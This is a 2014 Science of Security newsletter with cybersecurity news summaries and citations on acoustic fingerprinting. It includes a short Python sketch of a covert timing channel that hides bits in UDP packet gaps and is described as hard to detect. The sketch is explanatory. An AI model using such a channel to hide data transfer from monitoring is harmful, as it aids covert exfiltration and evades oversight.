Science of Security (SoS) Newsletter (2014 - Issue 2)

2014 - Issue #02


General Topics of Interest:


General Topics of Interest include news items related to cybersecurity, information on academic SoS research, interdisciplinary SoS research, brief profiles of leaders in the field of SoS research, and descriptions of entities outside the United States involved in related research.

Publications:

The Publications of Interest section contains bibliographical citations, including abstracts (if available) and links on specific topics and research problems of interest to the Science of Security community. Please check back regularly for new information.

Table of Contents

(ID#:14-2009)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


In the News (2014-02)


  • "Facebook disrupts cryptocurrency-mining botnet Lecpetex", SC Magazine, 09 July 2014. Facebook teamed up with law enforcement to disrupt the cryptocurrency-mining botnet "Lecpetex". The botnet used Facebook spam messages to deliver malicious files that mined cryptocurrency on the victim's computer and hijacked the victim's account to propagate the malware via further spam. (ID#: 14-50000) See http://www.scmagazine.com/facebook-disrupts-cryptocurrency-mining-botnet-lecpetex/article/360154/
  • "McAfee Plots Security Framework for Internet of Things", Infosecurity Magazine, 09 July 2014. McAfee has joined the Open Interconnect Consortium -- a project to "define and deliver device-to-device connectivity requirements for the internet of things (IoT)" -- to help improve security standards for the IoT. The sheer number and variety of devices expected to join the IoT make it a prime security risk. (ID#: 14-50009) See http://www.infosecurity-magazine.com/view/39236/mcafee-plots-security-framework-for-internet-of-things/
  • "IEEE Launches Two Anti-malware Services", Infosecurity Magazine, 09 July 2014. IEEE has launched two of its own anti-malware services as part of a new Anti-Malware Support Service (AMSS) project to "provide a place for collaboration on new technologies and standards-related offerings." Additional services are planned to be released in the future. (ID#: 14-50010) See http://www.infosecurity-magazine.com/view/39214/ieee-launches-two-antimalware-services/
  • "Microsoft Error Plunged No-IP Punters Into Darkness", Infosecurity Magazine, 03 July 2014. Despite warnings from the cybersecurity community, No-IP has been criticized for its slow response to abuse of its services for malicious purposes. In a recent attempt to snuff out a botnet, Microsoft's Digital Crimes Unit (DCU) ended up blocking No-IP services for legitimate users. (ID#: 14-50011) See http://www.infosecurity-magazine.com/view/39149/microsoft-error-plunged-noip-punters-into-darkness/
  • "CyberRX preps health care community for cyberattack", GCN, 01 July 2014. The Department of Health and Human Services and the Health Information Trust Alliance (HITRUST) teamed up with ten private sector organizations to test the ability of healthcare providers to prevent and respond to cyber attacks. The real-life nature of the exercises makes them invaluable for determining the state of healthcare security. (ID#: 14-50015) See http://gcn.com/articles/2014/07/01/cyberrx.aspx?admgarea=TC_SecCybersSec
  • "Isolate and conquer: Getting past a reliance on layered security", FCW, 09 July 2014. Most organizations rely on costly layers of protective measures to defend against cyber attack, but vulnerabilities deep within devices -- such as in an operating system kernel -- can be used to defeat these stacks of layered security all at once. Over 80 Windows kernel vulnerabilities were discovered in 2013 alone. (ID#: 14-50016) See http://fcw.com/articles/2014/07/09/crosby--micro-virtualization.aspx
  • "DOT CIO on cyber, shared services and 'technology that is changing constantly'", FCW, 08 July 2014. An interview with DOT CIO Richard McKinney. In his first year as the DOT CIO, McKinney has adopted a strong focus on cybersecurity, recognizing it as an integral part of keeping America's infrastructure safe. (ID#: 14-50017) See http://fcw.com/articles/2014/07/08/dot-mckinney-qanda.aspx
  • "NIST goes global with cyber framework", FCW, 03 July 2014. In the interest of promoting international dialogue on cybersecurity, NIST has been taking its new cyber framework, developed jointly with government and critical infrastructure firms, overseas. The focus is not on showing off the framework itself but on the process by which it was developed, in the hope that other nations can learn from it and produce their own versions. (ID#: 14-50018) See http://fcw.com/articles/2014/07/03/nist-global-cyber-framework.aspx
  • "Teaming up to train, recruit cyber specialists", FCW, 18 July 2014. Lawrence Livermore National Laboratory announced that it will be joining Bechtel BNI and Los Alamos National Laboratory in their effort to train a new generation of cyber defense professionals to protect critical infrastructure. The program will prepare trainees to guard against cyber threats in government and private sector environments. (ID#: 14-50021) See http://fcw.com/articles/2014/07/18/national-labs-cyber-training.aspx
  • "Treasury Secretary warns of cyber threat to financial sector", FCW, 16 July 2014. In a recent speech in New York City, Treasury Secretary Jacob Lew highlighted the seriousness of the cyber risk to the financial sector. According to Lew, cyber crime "undercuts America's businesses and undermines U.S. competitiveness" and can "pose a threat to financial stability". (ID#: 14-50022) See http://fcw.com/articles/2014/07/16/treasury-warning-on-cyber.aspx
  • "Data breach epidemic shines spotlight on shared secrets", GCN, 17 July 2014. No matter how good security measures may be, passwords are merely shared secrets that rely on both the end user and authenticating party. Human error and hardware/software vulnerabilities are always possible and can compromise even the most secure systems. Data breaches that reveal users' passwords have become a serious issue. (ID#: 14-50030) See http://gcn.com/articles/2014/07/17/isc2-shared-secrets-security.aspx?admgarea=TC_SecCybersSec
  • "New proactive approach unveiled to detect malicious software in networked computers and data", Virginia Tech News, 04 June 2014. Researchers at Virginia Tech have announced new research that uses causal relations and semantic reasoning to detect illegitimate network activities. This method is proactive rather than reactive, making it a powerful tool for preventing malware. (ID#:14-1893) See http://www.vtnews.vt.edu/articles/2014/06/060414-engineering-malware.html
  • "Computer scientists develop tool to make the Internet of Things safer", UCSD Jacobs School of Engineering, 02 June 2014. Computer scientists at UCSD developed a tool to test the security of hardware, based on Gate-level Information Flow Tracking (GLIFT) technology. This will help the "Internet of Things" -- a proposed network of smart devices such as cars, cell phones and medical devices -- stay secure. (ID#:14-1894) See http://www.jacobsschool.ucsd.edu/news/news_releases/release.sfe?id=152
  • "Navy puzzle challenge blends social media, cryptography", GCN, 02 June 2014. The winners of the Navy's "Project Architeuthis", a cryptography puzzle game, were announced. Players had to solve "complex, story-like" puzzles based on clues posted to Facebook. By interacting with "people who enjoy complicated, story-based puzzle solving", the Navy hopes to attract bright minds to its Information Dominance Corps. (ID#:14-1895) See http://gcn.com/articles/2014/06/02/project-architeuthis.aspx
  • "Automating Cybersecurity", The New York Times, 04 June 2014. A competition held by DARPA is offering a $2 million prize to a programming team that can build software that automatically detects intruders, finds the security flaws that allow breaches, and fixes those flaws. The challenge is expected to bring together hackers and academics to help automate cyber defense. (ID#:14-1897) See http://cacm.acm.org/news/175515-automating-cybersecurity/fulltext
  • "Exclusive: U.S. companies seek cyber experts for top jobs, board seats", Reuters, 30 May 2014. Following an increase in high-profile security breaches, many large U.S. companies are seeking to increase the strength of their cyber defenses by hiring more cyber experts. Demand for chief information security officers (CISOs) and other security experts is increasing; those positions are being elevated in management hierarchies. (ID#:14-1899) See http://www.reuters.com/article/2014/05/30/us-usa-companies-cybersecurity-exclusive-idUSKBN0EA0BX20140530
  • "Quantum Cryptography with ordinary equipment", IEEE Spectrum, 30 May 2014. Japanese researchers revealed a unique approach to quantum cryptography which incorporates phase shifting of optical signals in fiber-optic cable to transmit cipher keys. This easy-to-implement method does not require the same transmission measurements that are used by conventional quantum systems to detect key tampering. (ID#:14-1900) See http://cacm.acm.org/news/175390-quantum-cryptography-with-ordinary-equipment/fulltext
  • "Test to leverage cloud expansion", Evaluation Engineering, June 2014. Cisco Systems recently announced plans to, with its partners, invest over $1 billion toward expanding cloud technology to create an "intercloud", or network of clouds. Cloud computing and the "Internet of Everything" have been growing steadily in recent years and are expected to provide a $19 trillion economic opportunity in the next decade, according to Cisco. (ID#:14-1906) See http://www.evaluationengineering.com/articles/201406/test-to-leverage-cloud-expansion.php
  • "16-Year-Old OpenSSL Bug Detected", PC Magazine, 06 June 2014. A recently-discovered flaw, which took 16 years to find due to insufficient code reviews, can be exploited to "eavesdrop and make falsifications on your communication when both a server and a client are vulnerable." OpenSSL server versions 1.0.1h, 1.0.0m, and 0.9.8za are unaffected. (ID#:14-1907) See http://www.pcmag.com/article2/0,2817,2459073,00.asp
  • "Mozilla pushes internet security reform through study", SC Magazine, 06 June 2014. Mozilla is awaiting the results of the Cyber Security Delphi research and recommendation initiative's effort to create a "concrete agenda" to help address threats to online security. Mozilla has already put together its own advisory board with experts from prestigious universities and the ACLU. (ID#:14-1915) See http://www.scmagazine.com/mozilla-pushes-internet-security-reform-through-study/article/351445/
  • "Cybersecurity a top priority in Senate appropriations bill", FCW, 09 June 2014. A 2015 Senate appropriations bill is giving cybersecurity provisions high priority. The bill will provide more funding to entities like the FBI's National Cyber Investigative Joint Task Force, NIST's planned National Cybersecurity Center of Excellence, and others. (ID#:14-1918) See http://fcw.com/articles/2014/06/09/cybersecurity-in-senate-cjs-bill.aspx
  • "China making steady gains in cyber, military IT", FCW, 06 June 2014. On June 5, the Pentagon charged China with stealing U.S. intellectual property, amid rising tensions between China and the U.S. over information security and cyber-espionage. (ID#:14-1919) See http://fcw.com/articles/2014/06/06/china-cyber-report.aspx
  • "NIST updates monitoring authorization process", FCW, 06 June 2014. The NIST sent out new guidance to federal agencies, proposing an information system continuous monitoring (ISCM) program to strengthen the security authorization of information systems. (ID#:14-1920) See http://fcw.com/articles/2014/06/06/nist-cdm-guidelines.aspx
  • "White House looking to Capitol Hill on cyber", FCW, 05 June 2014. Though the executive branch has issued several executive orders to help bolster U.S. cybersecurity, the White House is looking to Congress to act on one of the few bipartisan issues left, namely, cybersecurity. With the Senate's recent all-in-one approach to cyber issues falling short, a "piecemeal" approach might be required to yield results. (ID#:14-1921) See http://fcw.com/articles/2014/06/05/cybersecurity-legislation.aspx
  • "IEEE CEO Loeb Named ISACA CEO", Infosecurity Magazine, 06 June 2014. Matthew Loeb, a former IEEE CEO, will assume his role as the new CEO of the Information Systems Audit and Control Association (ISACA) on Nov. 1st. Loeb plans to increase ISACA's cybersecurity capabilities and raise awareness of the need for cybersecurity in businesses. (ID#:14-1925) See http://www.infosecurity-magazine.com/view/38748/ieee-ceo-loeb-named-isaca-ceo/
  • "Databases of personnel at US command in S Korea hacked", Cyber Defense Magazine, 09 June 2014. A cyber attack on United States intelligence has led to a data breach that compromised the personal information of around 16,000 current and former workers employed by the U.S. in South Korea. The stolen details about U.S. activities in the area could be used for malicious purposes. (ID#:14-1928) See http://www.cyberdefensemagazine.com/databases-of-personnel-at-us-command-in-s-korea-hacked/
  • "Guarding against 'Carmageddon' cyberattacks", Vanderbilt News, 11 June 2014. As automated "smart transportation systems" -- a network of sensors, computers, and signals -- provide increasing potential for safer and more efficient transportation, the risk of those systems becoming victim to cyber attacks increases. Developing the ability to deter, detect, and respond to these attacks is a top priority for academic and government researchers. (ID#:14-1936) See http://news.vanderbilt.edu/2014/06/carmageddon-cyberattacks/
  • "Making a covert channel on the Internet", Cornell Chronicle, 03 June 2014. Researchers have discovered a new way to transmit data covertly over the internet through a method named "Chupja". In this technique, binary data is encoded by modulating the duration of idle characters between packets of data by mere picoseconds, which makes detection by monitoring software difficult (see the illustrative timing-channel sketch after this list). (ID#:14-1937) See http://www.news.cornell.edu/stories/2014/06/making-covert-channel-internet
  • "TSA looks to cloud providers for disaster recovery", FCW, 11 June 2014. The TSA is asking for advice from cloud service providers on how they can help back up the TSA's Technology Infrastructure Modernization (TIM) division in case of emergency. The TIM division helps the TSA communicate with other homeland security-related entities to recover from disasters. (ID#:14-1938) See http://fcw.com/articles/2014/06/11/tsa-cloud-rfi.aspx
  • "The Internet of government things", FCW, 11 June 2014. As the government recognizes the capability of the Internet of Things (IoT) to provide socio-economic benefits, organizations like the GSA and NIST are promoting development of IoT systems through programs like the SmartAmerica Challenge. The cyber-physical systems that make up the IoT show promise for improving numerous facets of life, including transportation, security, and healthcare. (ID#:14-1939) See http://fcw.com/articles/2014/06/11/internet-of-things-expo.aspx
  • "Cyber Currencies Get Boost from High-Profile Endorsements", Scientific American, 06 June 2014. Bitcoin, despite facing serious trouble in early 2014, is having better luck as big names like TV provider Dish Network and rapper 50 Cent are set to start accepting the cyber currency. More importantly, the Apple Store, which has avoided any involvement with digital currencies in the past, is now preparing to allow iOS developers to support certain cyber currencies. (ID#:14-1940) See http://www.scientificamerican.com/podcast/episode/cyber-currencies-get-boost-from-high-profile-endorsements1/
  • "ICS-CERT: Federal Highway Signs Are Easily Hackable", Infosecurity Magazine, 11 June 2014. In the wake of numerous pranks on digital highway signs, the ICS-CERT is recommending mitigating their notorious lack of security through VPNs and better password management. The signs, upon which commuters rely for information, are important for the safety and efficiency of highways. (ID#:14-1948) See http://www.infosecurity-magazine.com/view/38794/icscert-federal-highway-signs-are-easily-hackable/
  • "Still (Heart)bleeding: New OpenSSL MiTM Vulnerability Surfaces", Infosecurity Magazine, 10 June 2014. Because of the constant scrutiny of the open-source OpenSSL code, new security flaws are constantly being unearthed and patched. For some, this system of disclosure and repair is evidence that the open-source collaboration model works, though others will point to the endless trickle of vulnerabilities as an indication that the code might never be perfected. (ID#:14-1951) See http://www.infosecurity-magazine.com/view/38727/still-heartbleeding-new-openssl-mitm-vulnerability-surfaces/
  • "Last call for comments on Keccak encryption", GCN, 13 June 2014. Before adopting its new Keccak family of hashing algorithms to improve upon the long-lived SHA-2 federal standard, the NIST is giving the public a three-month period to voice their thoughts. This will allow concerns about patent infringement and other issues to be raised. (ID#:14-1953) See http://gcn.com/blogs/cybereye/2014/06/keccak-comments.aspx?admgarea=TC_SecCybersSec
  • "House Intel chairman upbeat on cyber legislation", FCW, 12 June 2014. Following the success of the House of Representatives' cybersecurity bill, the Senate is expected to pass its own information-sharing bill this year. The success of cyber legislation in the recent past is credited to cyber officials who have educated lawmakers on the importance of cybersecurity issues. (ID#:14-1954) See http://fcw.com/articles/2014/06/12/intelligence-chairman-optimistic-on-cyber.aspx
  • "GCHQ Set to Share Threat Intelligence With CNI Firms", Infosecurity Magazine, 17 June 2014. The UK spy agency GCHQ is slated to start sharing intelligence with government CSPs and eventually CNI firms, which is intended to help protect the UK's cyber infrastructure. This move is seen as a result of the new CISP (Cyber Security Information Sharing Partnership) that was launched last year. (ID#:14-1955) See http://www.infosecurity-magazine.com/view/38896/gchq-set-to-share-threat-intelligence-with-cni-firms/
  • "IBM CISO: Company boards need big picture threat data", SC Magazine, 17 June 2014. According to IBM's CISO Joanne Martin, top-level employees and boards of directors need to be better informed on the details and context of information security so they can respond more effectively to cyber security issues. It is the responsibility of IT professionals, said Martin, to educate these business leaders. (ID#:14-1959) See http://www.scmagazine.com/ibm-ciso-company-boards-need-big-picture-threat-data/article/356265/
  • "Agencies work to close mobile security, connectivity gaps", GCN, 16 June 2014. Though many workers like to bring their own mobile phones to work, doing so can create a security risk if proper security measures are not in place. New technologies are being researched to create a safer environment for mobile devices and mobile networks in the workplace. (ID#:14-1967) See http://gcn.com/articles/2014/06/16/byod-connectivity.aspx?admgarea=TC_SecCybersSec
  • "DDoS Attack Puts Code Spaces Out of Business", PC Magazine, 19 June 2014. Code hosting service Code Spaces was forced to shut down after a DDoS attack and unauthorized access to the company's Amazon EC2 control panel caused it to lose most of its data and backups. With the cost of recovery estimated to be too great, Code Spaces stated that it "will not be able to operate beyond this point". (ID#:14-1968) See http://www.pcmag.com/article2/0,2817,2459765,00.asp
  • "Ancestry.com Hit by 3-Day DDoS Attack", PC Magazine, 19 June 2014. After being forced offline by a three-day long DDoS attack, Ancestry.com is back up and running. According to Ancestry.com's CTO Scott Sorensen, no customer data was stolen by the attackers. (ID#:14-1969) See http://www.pcmag.com/article2/0,2817,2459760,00.asp
  • "Tools to tighten the Internet of Things", GCN, 20 June 2014. The Internet of Things promises to be a reliable way for technology to increase the productivity, connectivity, and well-being of society, but as the IoT grows, so do concerns over its security. It will be the job of the security industry, both civilian and government, to develop software and other methods for keeping it secure. (ID#:14-1970) See http://gcn.com/blogs/cybereye/2014/06/internet-of-things.aspx?admgarea=TC_SecCybersSec
  • "New NIST guidance planned as part of federal info policy", FCW, 12 June 2014. In order to standardize the management of information that is deemed sensitive but not classified, the National Archives and Records Administration (NARA) and the NIST are taking steps toward normalizing the handling of controlled unclassified information (CUI). (ID#:14-1971) See http://fcw.com/articles/2014/06/12/nist-guidance-as-federal-policy.aspx?admgarea=TC_Policy
  • "Governments Bear the Brunt as Targeted Attacks Rise", Infosecurity Magazine, 23 June 2014. A report by Russian Internet security firm Kaspersky indicates that targeted attacks are on the rise, with 12% of organizations experiencing at least one attack in 2013, up from 9% in previous years; government and defense organizations specifically saw an even higher rate of 18%. (ID#:14-1973) See http://www.infosecurity-magazine.com/view/38978/governments-bear-the-brunt-as-targeted-attacks-rise/
  • "FBI, NYPD, and MTA Team on Cybersecurity Task Force", Infosecurity Magazine, 20 June 2014. The FBI, NYPD, and MTA are pooling their resources and capabilities in the new Financial Cyber Crimes Task Force, a joint effort to fight cyber attacks. The collaboration is based on a model that has been used successfully in the past for fighting terrorism and bank robbery, according to FBI assistant director George Venizelos. (ID#:14-1976) See http://www.infosecurity-magazine.com/view/38968/fbi-nypd-and-mta-team-on-cybersecurity-task-force/
  • "Talk stresses IoT concerns as today's problems", SC Magazine, 19 June 2014. The number of devices on the internet, which surpassed the number of humans on the planet in 2008 and is expected to reach 50 billion by 2020, is cause for concern from a cybersecurity standpoint. To protect this network of devices, including those on the upcoming IoT, new technologies like IPv6 will have to be implemented. (ID#:14-1980) See http://www.scmagazine.com/talk-stresses-iot-concerns-as-todays-problems/article/356777/
  • "SAIC looks to make cyber services easier to buy", FCW, 23 June 2014. SAIC is rolling out a new program to streamline the process of purchasing security services for government customers, allowing government entities on tight budgets to purchase these services without the complicated, drawn-out process that they often must endure. (ID#:14-1987) See http://fcw.com/articles/2014/06/23/saic-cyber-services.aspx
  • "Police turning to mobile malware for monitoring", Computerworld, 25 June 2014. Italian company Hacking Team is one of a few groups that makes malware for governments and law enforcement to intercept data and track internet users. The falling cost of these tools means that they can become more widespread, and may be used by the governments of developing nations to violate their citizens' rights. (ID#:14-1989) See http://www.computerworld.com/s/article/9249352/Police_turning_to_mobile_malware_for_monitoring
  • "Can telework improve cybersecurity?", GCN, 27 June 2014. At a time when cybersecurity professionals are needed most by the government, studies find that there is a potentially dangerous shortage. With cybersecurity experts generally making more money in the private sector, the government will have to make the jobs it offers appealing, and offering teleworking could be a crucial part of that effort. (ID#:14-1991) See http://gcn.com/blogs/cybereye/2014/06/telework.aspx?admgarea=TC_SecCybersSec
  • "NSA's Rogers: JIE crucial to cyber defense", FCW, 24 June 2014. NSA director Michael Rogers expressed his eagerness for the DoD's move toward a Joint Information Environment (JIE), which is set to replace the current network structure. According to Rogers, the old "service-centric approach to networks" has been costly to the DoD. (ID#:14-1993) See http://fcw.com/articles/2014/06/24/nsa-rogers-speech.aspx
  • "Four to six teams expected to bid on Defense health record effort", FCW, 25 June 2014. Several teams are expected to compete for a DoD contract to provide a "commercial, off-the-shelf electronic records product" for the military. The project, which will cost around $11 billion, will improve the integration of military health services. (ID#:14-1994) See http://fcw.com/articles/2014/06/25/defense-health-record-effort.aspx
  • "DHS plans for cybersecurity in interconnected world", FCW, 27 June 2014. The Department of Homeland Security, which has just released its new Quadrennial Homeland Security Review (QHSR), is expressing increasing concern over the security of interconnected devices. The growing vulnerability of these devices is part of the dramatic change in cybersecurity threats that has occurred since the DHS last published a QHSR. (ID#: 14-1994b) See http://fcw.com/articles/2014/06/27/dhs-qhsr.aspx
  • "Next Generation Internet Will Arrive Without Fanfare, Says UMass Amherst Network Architect", University of Massachusetts Amherst, 24 June 2014. According to a UMass researcher, the next-generation internet -- one with "far better security, greater mobility and many other improved features" -- is not far away, but the transition will be gradual, seamless, and not noticeable to most internet users. (ID#:14-1995) See http://www.umass.edu/newsoffice/article/next-generation-internet-will-arrive
  • "Cracks emerge in the cloud", A*STAR Research, 18 June 2014. A Singapore-based research team has found numerous vulnerabilities in cloud service providers Dropbox, Google Drive, and Microsoft SkyDrive. Insecure URL storage, URL shortening, and other practices can leave a user's private data vulnerable. (ID#:14-1996) See http://www.research.a-star.edu.sg/research/6983
  • "Long distance Glasshole Snoopers Can Spot User PINs", Infosecurity Magazine, 27 June 2014. Researchers at the University of Massachusetts, Lowell have created software that uses mobile camera devices -- such as the new Google Glass -- to detect pass codes as they are being typed. Though watching people type is nothing new, this kind of software could allow criminals to far exceed the capabilities of the human eye. (ID#:14-1999) See http://www.infosecurity-magazine.com/view/39052/long-distance-glasshole-snoopers-can-spot-user-pins/
  • "Cisco Open-sources Experimental Cipher", Infosecurity Magazine, 24 June 2014. Though traditional block ciphers work very well on large blocks of data (128, 192, 256-bit), use of these encryption tools on smaller objects can lead to an enormous inflation of the size of the data. Cisco is working on a new encryption scheme to more efficiently manage these smaller objects. (ID#:14-2004) See http://www.infosecurity-magazine.com/view/38983/cisco-opensources-experimental-cipher/
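
For readers curious about how a covert timing channel works in principle, the sketch below encodes bits in the gaps between UDP packets. It is only a coarse, millisecond-scale illustration of the general idea behind the Cornell "Chupja" item above, not that technique itself, which operates at the physical layer with far finer timing. The function names and gap values are hypothetical, and only the Python standard library is assumed.

    import socket, time

    GAP_ZERO = 0.010   # gap (seconds) encoding a 0 bit -- hypothetical value
    GAP_ONE = 0.030    # gap encoding a 1 bit
    THRESHOLD = 0.020  # receiver's decision boundary between the two gaps

    def send_bits(bits, addr=("127.0.0.1", 9999)):
        """Transmit bits covertly: each inter-packet delay carries one bit."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(b"x", addr)  # reference packet to start the clock
        for bit in bits:
            time.sleep(GAP_ONE if bit else GAP_ZERO)
            sock.sendto(b"x", addr)

    def recv_bits(n, port=9999):
        """Recover n bits by thresholding packet inter-arrival times."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind(("127.0.0.1", port))
        sock.recv(64)  # reference packet
        last, bits = time.monotonic(), []
        for _ in range(n):
            sock.recv(64)
            now = time.monotonic()
            bits.append(1 if now - last > THRESHOLD else 0)
            last = now
        return bits

Run recv_bits in one process and send_bits in another on the same host: to a traffic monitor the packets look identical, and only their timing carries the message, which is what makes such channels hard to detect.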

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Publications of Interest


The Publications of Interest section contains bibliographical citations, including abstracts (if available) and links on specific topics and research problems of interest to the Science of Security community.

These bibliographies include recent scholarly research on topics that have been presented or published within the past year. The specific topics are selected from materials that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are also chosen for their usefulness to current researchers. Some represent updates from work presented in previous years; others are new topics.

Researchers willing to share their work are welcome to submit a citation, abstract, and URL for consideration and posting, and to identify additional topics of interest to the community. Researchers are also encouraged to share this request with their colleagues and collaborators.

Send submissions to: research (at) SecureDataBank.net

(ID#:14-2010)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Acoustic Fingerprints


Acoustic fingerprints can be used to identify an audio sample or to quickly locate similar items in an audio database. As a security tool, fingerprints offer a modality of biometric identification of a user. Current research explores various aspects and applications, including the use of these fingerprints for mobile device security, anti-forensics, image processing techniques, and client-side embedding.
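
To make the idea concrete, the sketch below computes a simple spectrogram-peak fingerprint: pairs of spectral peaks are hashed together with their time offset, so matching two recordings reduces to counting shared hashes. This is a generic illustration of the approach surveyed in the citations that follow, not the method of any cited paper; it assumes numpy and scipy are available, and the neighborhood size and fan-out values are arbitrary.

    import numpy as np
    from scipy.ndimage import maximum_filter
    from scipy.signal import spectrogram

    def fingerprint(samples, rate, fan_out=5, max_dt=64):
        """Return (hash, time_offset) pairs for a 1-D mono audio signal."""
        freqs, times, sxx = spectrogram(samples, fs=rate, nperseg=1024)
        log_sxx = np.log1p(sxx)
        # A time-frequency bin is a peak if it is the maximum of its
        # neighborhood and rises above the mean spectrogram energy.
        peaks = (maximum_filter(log_sxx, size=15) == log_sxx) & (log_sxx > log_sxx.mean())
        f_idx, t_idx = np.nonzero(peaks)
        order = np.argsort(t_idx)
        f_idx, t_idx = f_idx[order], t_idx[order]
        hashes = []
        for i in range(len(t_idx)):
            # Pair each anchor peak with a few later peaks so each hash
            # encodes two frequencies plus the time gap between them.
            for j in range(i + 1, min(i + 1 + fan_out, len(t_idx))):
                dt = int(t_idx[j] - t_idx[i])
                if 0 < dt <= max_dt:
                    h = hash((int(f_idx[i]), int(f_idx[j]), dt))
                    hashes.append((h, int(t_idx[i])))
        return hashes

Matching a query against a database then amounts to counting hashes two recordings share at a consistent relative offset; distortions that move individual peaks only remove some hashes rather than breaking the whole fingerprint.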

  • Liu, Yuxi; Hatzinakos, Dimitrios, "Human Acoustic Fingerprints: A Novel Biometric Modality For Mobile Security," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3784,3788, 4-9 May 2014. (ID#:14-1601) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854309&isnumber=6853544 Recently, the demand for more robust protection against unauthorized use of mobile devices has been rapidly growing. This paper presents a novel biometric modality Transient Evoked Otoacoustic Emission (TEOAE) for mobile security. Prior works have investigated TEOAE for biometrics in a setting where an individual is to be identified among a pre-enrolled identity gallery. However, this limits the applicability to mobile environment, where attacks in most cases are from imposters unknown to the system before. Therefore, we employ an unsupervised learning approach based on Autoencoder Neural Network to tackle such blind recognition problem. The learning model is trained upon a generic dataset and used to verify an individual in a random population. We also introduce the framework of mobile biometric system considering practical application. Experiments show the merits of the proposed method and system performance is further evaluated by cross-validation with an average EER 2.41% achieved. Keywords: Autoencoder Neural Network; Biometric Verification; Mobile Security; Otoacoustic Emission; Time-frequency Analysis
  • Zeng, Hui; Qin, Tengfei; Kang, Xiangui; Liu, Li, "Countering Anti-Forensics Of Median Filtering," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.2704,2708, 4-9 May 2014. (ID#:14-1602) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854091&isnumber=6853544 The statistical fingerprints left by median filtering can be a valuable clue for image forensics. However, these fingerprints may be maliciously erased by a forger. Recently, a tricky anti-forensic method has been proposed to remove median filtering traces by restoring images' pixel difference distribution. In this paper, we analyze the traces of this anti-forensic technique and propose a novel counter method. The experimental results show that our method could reveal this anti-forensics effectively at low computation load. According to our best knowledge, it's the first work on countering anti-forensics of median filtering. Keywords: Image forensics; anti-forensic; median filtering; pixel difference
  • Rafii, Zafar; Coover, Bob; Han, Jinyu, "An Audio Fingerprinting System For Live Version Identification Using Image Processing Techniques," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.644,648, 4-9 May 2014. (ID#:14-1603) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853675&isnumber=6853544 Suppose that you are at a music festival checking on an artist, and you would like to quickly know about the song that is being played (e.g., title, lyrics, album, etc.). If you have a smartphone, you could record a sample of the live performance and compare it against a database of existing recordings from the artist. Services such as Shazam or SoundHound will not work here, as this is not the typical framework for audio fingerprinting or query-by-humming systems, as a live performance is neither identical to its studio version (e.g., variations in instrumentation, key, tempo, etc.) nor is it a hummed or sung melody. We propose an audio fingerprinting system that can deal with live version identification by using image processing techniques. Compact fingerprints are derived using a log-frequency spectrogram and an adaptive thresholding method, and template matching is performed using the Hamming similarity and the Hough Transform. Keywords: adaptive thresholding; Constant Q Transform; audio fingerprinting; cover identification
  • Naini, Rohit; Moulin, Pierre, "Fingerprint Information Maximization For Content Identification," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3809,3813, 4-9 May 2014. (ID#:14-1604) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854314&isnumber=6853544 This paper presents a novel design of content fingerprints based on maximization of the mutual information across the distortion channel. We use the information bottleneck method to optimize the filters and quantizers that generate these fingerprints. A greedy optimization scheme is used to select filters from a dictionary and allocate fingerprint bits. We test the performance of this method for audio fingerprinting and show substantial improvements over existing learning based fingerprints. Keywords: Audio fingerprinting; Content Identification; Information bottleneck; Information maximization
  • Bianchi, Tiziano; Piva, Alessandro, "TTP-free Asymmetric Fingerprinting Protocol Based On Client Side Embedding," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3987,3991, 4-9 May 2014. (ID#:14-1605) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854350&isnumber=6853544 In this paper, we propose a scheme to employ an asymmetric fingerprinting protocol within a client-side embedding distribution framework. The scheme is based on a novel client-side embedding technique that is able to transmit a binary fingerprint. This enables secure distribution of personalized decryption keys containing the Buyer's fingerprint by means of existing asymmetric protocols, without using a trusted third party. Simulation results show that the fingerprint can be reliably recovered by using non-blind decoding, and it is robust with respect to common attacks. The proposed scheme can be a valid solution to both customer's rights and scalability issues in multimedia content distribution. Keywords: Buyer-Seller watermarking protocol; Client-side embedding; Fingerprinting; secure watermark embedding
